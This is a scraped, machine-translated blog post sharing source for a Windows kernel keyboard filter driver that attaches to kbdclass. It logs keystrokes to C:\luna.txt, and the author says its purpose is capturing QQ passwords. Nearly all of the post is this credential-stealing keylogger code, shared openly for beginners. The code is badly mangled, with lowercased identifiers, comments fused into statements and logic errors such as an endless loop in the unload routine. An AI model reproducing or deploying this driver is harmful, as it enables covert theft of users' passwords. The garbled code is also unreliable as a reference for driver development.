Windows Driver Filter -- kbdclass filter, Cold River Alone Fishing enhanced version

Source: Internet
Author: User

This is the Cold River Alone Fishing keyboard filter with some modifications: the filtered QQ password is written into a buffer, and when a carriage return arrives or the buffer is full, the buffer is written to a file. Because the IRP is completed and its memory is reclaimed quickly, a global buffer is used instead, and a separate thread does the writing. I first tried the queued approach to processing IRPs, but found it relatively slow, so I had to do it this way. A few lines were added to the process-creation callback code; that part is not included here because the code is missing, so what follows is only approximate code. I am sharing it for beginners. If anything is wrong, thank you for pointing it out.

Seniors, please don't laugh at it.

Struct.h

/************************************///author:duanyueming//data:02/05/2015//file:lstruct.h/****************** /#ifndef _lstruct_h_#define _lstruct_h_typedef struct _device_extension {pdevice_object pdeviceobj ; Pdevice_object Pattachdev; Upper equipment Pdevice_object Plowdevice; Bottom equipment Pdevice_object pstoragedev; The stored device pdevice_object Ptardevice; Target device unicode_string Mydevicename; Unicode_string Mydevicesym; ULONG Pmydevflg;io_remove_lock Movelock;} device_extension,*pdevice_extension;typedef struct _multvar{  PVOID pbuff;  KEVENT waitevent;  ULONG  Length;} Multvar,*pmultvar; #define  buff_size 256typedef struct _my_buff{puchar pbuf;int maxsize;int cursize;int Offset;} mybuff,*pmybuff;typedef struct  _my_data{   pirp Irp; PVOID Pbuff; List_entry ListEntry;} My_data,*pmydata;

  

#define  mydeviceflags ' LUNA ' #define  mycdodeviceflags ' LCDO ' #define  removetag  ' lmn ' #define Delay_ One_microsecond   ( -10) #define Delay_one_millisecond   (delay_one_microsecond*1000) #define Delay_one_second        (delay_one_millisecond*1000) #define IS_MY_DEVICE_OBJECT (_obj)  (((pdevice_extension) _obj->deviceextension)->pmydevflg = = Mycdodeviceflags | | Pdevice_extension (_obj->deviceextension)->PMYDEVFLG = = mydeviceflags) #define Is_my_control_device (_obj)  (((pdevice_extension) _obj->deviceextension)->pmydevflg = = mycdodeviceflags)

  

/******** not archived function ************/ntstatusobreferenceobjectbyname (punicode_string objectname,ulong Attributes,PACCESS_ State accessstate,access_mask Desiredaccess,pobject_type Objecttype,kprocessor_mode AccessMode,PVOID ParseContext, PVOID *object); extern pobject_type *iodriverobjecttype;

  

NTSTATUS lqueryobjectname (PVOID lobject,punicode_string name)//query file name {NTSTATUS status; Pobject_name_information Pbuff; WCHAR cache[64]; ULONG Needlength;pbuff = (pobject_name_information) cache;status = obquerynamestring (lobject,pbuff,64*sizeof (WCHAR), &needlength), if (status = = Status_info_length_mismatch) {Pbuff = (pobject_name_information) ExAllocatePool ( Nonpagedpool,needlength); if (Pbuff = = NULL) {return status_insufficient_resources;} RtlZeroMemory (pbuff,needlength); status = Obquerynamestring (Lobject,pbuff,needlength,&needlength);} name->length = 0; Rtlcopyunicodestring (name,&pbuff->name); return status;} VOID luninstalldriver (Pdriver_object pdriverobject) {pdevice_extension pdevext; Prkthread CurrentThread; Large_integer time; Pdevice_object pdevobj;time = Rtlconvertlongtolargeinteger (100*delay_one_second);pD evobj = pDriverObject-> DeviceObject; CurrentThread = Kegetcurrentthread (); Kesetprioritythread (currentthread,low_realtime_priority); while (pdevobj) {Pdevext = (pdevice_extension) Pdevobj->deviceextension;iodeletesymboliclink (&pdevext->mydevicesym);pD evobj = pDevObj-> Nextdevice;iodetachdevice (Pdevext->plowdevice); Iodeletedevice (pdevext->pdeviceobj);} while (1) {}kdprint (("Driver UnInstall complete,leave\n");} NTSTATUS ldispatchroutine (pdevice_object pdeviceobject,pirp pirp) {pio_stack_location STACK = Iogetcurrentirpstacklocation (PIRP); ioskipcurrentirpstacklocation (PIRP); return IoCallDriver (((PDEVICE_EXTENSION) pdeviceobject->deviceextension)->plowdevice,pirp);}

The following is the code:

#include "QFilter.h" NTSTATUS driverentry (pdriver_object pdriverobject,punicode_string pregistrypath) {int i; NTSTATUS status; HANDLE thread;/******** initializes global variables ***********/iswritedata = False;isneedfilter = False;initializelisthead (&g_list); G_buff = (pmybuff) exallocatepool (nonpagedpool,sizeof (Mybuff)), if (G_buff ==null) {Kdprint (("No Through memory \ n")); return 0;} Else{g_buff->pbuf = (Puchar) exallocatepool (nonpagedpool,buff_size); ASSERT (g_buff->pbuf); g_buff->maxsize = Buff_size;g_buff->offset = 0;g_buff->cursize = 0;} /******** Initialize global variable ***********/pdriverobject->driverunload = luninstalldriver;for (i = 0;i <irp_mj_maximum_ function;i++) {Pdriverobject->majorfunction[i] = ldispatchroutine;} Pdriverobject->majorfunction[irp_mj_read] = Readroutine;pdriverobject->majorfunction[irp_mj_power] = Powerroutine;pdriverobject->majorfunction[irp_mj_device_control] = contrlroutine;//pdriverobject-> Majorfunction[irp_mj_close] = Closeirp;status = Createmycdodevice (pdriverobjeCT); if (! Nt_success (status) {return status;} Status = Bindkbddriver (Pdriverobject); Nt_success (status) {return status;} Status = Pscreatesystemthread (&thread,generic_all,null,null,null,processirp,null); Nt_success (status) {Kdprint ("Create Thread Failed \ n"); return status;} Kdprint ("Start Kbd Filter successfuly \ n"); return status_success;} VOID processirp (PVOID pContext) {//pmydata data;    PVOID buff = NULL;    for (;;) {//Plist_entry Headdata = Removeheadlist (&g_list);//data = Containing_record (headdata,my_data,listentry); if (I Swritedata = = true&& G_buff->pbuf! 
= NULL) {Kdprint (("hehehehe\n")); Kdprint (("111\n")); Kdprint (("2222\n")); Mywritedatafile ();    RtlZeroMemory (g_buff->pbuf,g_buff->maxsize); g_buff->cursize = 0;g_buff->offset = 0;}   }}ntstatus powerroutine (pdevice_object pdeviceobj,pirp pirp) {postartnextpowerirp (PIRP);   Ioskipcurrentirpstacklocation (PIRP); Return Pocalldriver (((pdevice_extension) pdeviceobj->deviceextension)-&GT;PLOWDEVICE,PIRP);} NTSTATUS Createmycdodevice (Pdriver_object pdriverobj) {NTSTATUS status; Unicode_string Devsym; Unicode_string Devname; Pdevice_object Pnewdev; Pdevice_extension Pdevext; Rtlinitunicodestring (&devname,l "\\Device\\QFilter"); status = IoCreateDevice (Pdriverobj,sizeof (device_ EXTENSION), &devname,file_device_unknown,0,true,&pnewdev); if (!   Nt_success (status) {Kdprint ("Create CDO devobj Failed \ n")); return status;} Rtlinitunicodestring (&devsym,l "\ \??    \\QFilterSym "); Status = Iocreatesymboliclink (&devsym,&devname); Nt_success (status) {Kdprint ("Create Cdo symbolic Failed \ n"); Iodeletedevice (Pnewdev); return status;} Pnewdev->flags |=do_buffered_io;pdevext = (pdevice_extension) PNEWDEV-&GT;DEVICEEXTENSION;PDEVEXT-&GT;PMYDEVFLG = Mycdodeviceflags;pdevext->mydevicename = Devname;pdevext->pdeviceobj = Pnewdev;pdevext->mydevicesym = Devsym;return status_success;} NTSTATUS bindkbddriver (Pdriver_object pdriverobj) {unicode_string kbdclass; PdeviCe_object Pnewdev; Pdevice_object Ptardev; Pdevice_object Plowdev; Pdevice_extension Pdevext; Pdriver_object Pkbddrob; NTSTATUS status = Status_success; Rtlinitunicodestring (&kbdclass,l "\\Driver\\kbdclass"); status = Obreferenceobjectbyname (&kbdclass,obj_ Case_insensitive,null,0,*iodriverobjecttype,kernelmode,null, (pvoid*) &pkbddrob); Nt_success (status) {Kdprint ("Load kbdobj Failed:%x\n", status); return status;} Obdereferenceobject (pkbddrob);p Tardev = Pkbddrob->deviceobject;while (ptardev) {status = IoCreateDevice ( Pdriverobj,sizeof (device_extension), 
Null,ptardev->devicetype,ptardev->characteristics,false,&pnewdev ); if (! Nt_success (status) {Kdprint ("Create Device failed:%x\n", status); return status;} Else{status = Ioattachdevicetodevicestacksafe (Pnewdev,ptardev,&plowdev);    Nt_success (status) {Kdprint ("Bind Failed \ n"); return status;} Pdevext = (pdevice_extension) pnewdev->deviceextension;pnewdev->flags |= plowdev->flags& (DO_BUFFERED_ IO | Do_direct_io | do_power_pagable);p newdev->flags &= ~do_device_initializing;pdevext->pdeviceobj = pNewDev;pDevExt-> PMYDEVFLG = Mydeviceflags;pdevext->plowdevice = Plowdev;pdevext->pattachdev = PTarDev;pNewDev->StackSize = Pdevext->plowdevice->stacksize+1;//ioinitializeremovelock (&pdevext->movelock,0,0,0);} Ptardev = Ptardev->nextdevice;} Rtlinitunicodestring (&filename,l "\\dosdevices\\c:\\luna.txt"); Kdprint (("Complete Device Bind \ n"); return status_success;} VOID Mywritedatafile () {HANDLE handl;object_attributes objattr;io_status_block BLOCK;    NTSTATUS status; Initializeobjectattributes (&objattr,&filename,obj_case_insensitive,null,null); status = ZwCreateFile ( &handl,generic_write,&objattr,&block,null,file_attribute_normal,0,file_open_if,file_synchronous_io _nonalert,null,0); if (! Nt_success (status) {Kdprint ("Create File Storage data failed:%x", status); return;} Status = Zwwritefile (handl,null,null,null,&block,g_buff->pbuf,g_Buff->cursize,0,null); if (! Nt_success (status) {Kdprint ("WriteFile failed:%x \ n", status)); Zwclose (Handl); return;} Kdprint (("Code:%c \ n", g_buff->pbuf)); Zwclose (Handl);} NTSTATUS Readcompletefun (pdevice_object pdeviceobj,pirp pirp,pvoid pContext) {ULONG keystructnum; Pkeyboard_input_data ptr; ULONG i; UCHAR asciicode;if (/*isneedfilter &&*/nt_success (pirp->iostatus.status)) {keystructnum = pIrp->   iostatus.information/(pirp->iostatus.information/sizeof (keyboard_input_data));   ptr = (pkeyboard_input_data) pirp->associatedirp.systembuffer; for (i =0; I <keystructnum;++i) {Asciicode = Print_keystroke (Ptr[i].   
Makecode); if (G_buff->offset >= (buff_size-(5*ucharsize)) | | Asciicode = = ' 0x0D ') {kdprint ("Steup Write Data!!!!!!!!!!!!!!!!!!!   \ n "));   Iswritedata =true;   Rtlcopymemory (((G_BUFF-&GT;PBUF) + (G_buff->offset)), &asciicode,ucharsize);   G_buff->offset + = Ucharsize;   G_buff->cursize +=ucharsize; } else {IsWrItedata =false;   Kdprint (("------Buff small---Start Write Data to file--\ n"));   }}} if (pirp->pendingreturned) {iomarkirppending (PIRP); }return Pirp->iostatus.status;}   NTSTATUS readroutine (pdevice_object pdeviceobj,pirp pirp) {pio_stack_location STACK;   NTSTATUS status = Status_success;   if (pirp->currentlocation ==1) {pirp->iostatus.status = Status_invalid_device_request;   pirp->iostatus.information = 0;   IoCompleteRequest (pirp,io_no_increment);   return status_invalid_device_request;   } if (Is_my_control_device (pdeviceobj)) {pirp->iostatus.status = status_success;   pirp->iostatus.information = 0;   IoCompleteRequest (pirp,io_no_increment);   return status_success;   } stack = Iogetcurrentirpstacklocation (PIRP);   Iocopycurrentirpstacklocationtonext (PIRP);  Iosetcompletionroutine (pirp,readcompletefun,null,true,true,true); Return IoCallDriver (((pdevice_extension) pdeviceobj->deviceextension)->plowdevice,pirp);} NTSTATUSContrlroutine (pdevice_object pdeviceobj,pirp pirp) {pio_stack_location STACK = iogetcurrentirpstacklocation (PIRP); if (Is_my_control_device (Pdeviceobj)) {switch (Stack->parameters.deviceiocontrol.iocontrolcode) {}}switch (stack->  Parameters.DeviceIoControl.IoControlCode) {default:ioskipcurrentirpstacklocation (PIRP); Return IoCallDriver (((pdevice_extension) pdeviceobj->deviceextension)->plowdevice,pirp);}}

  
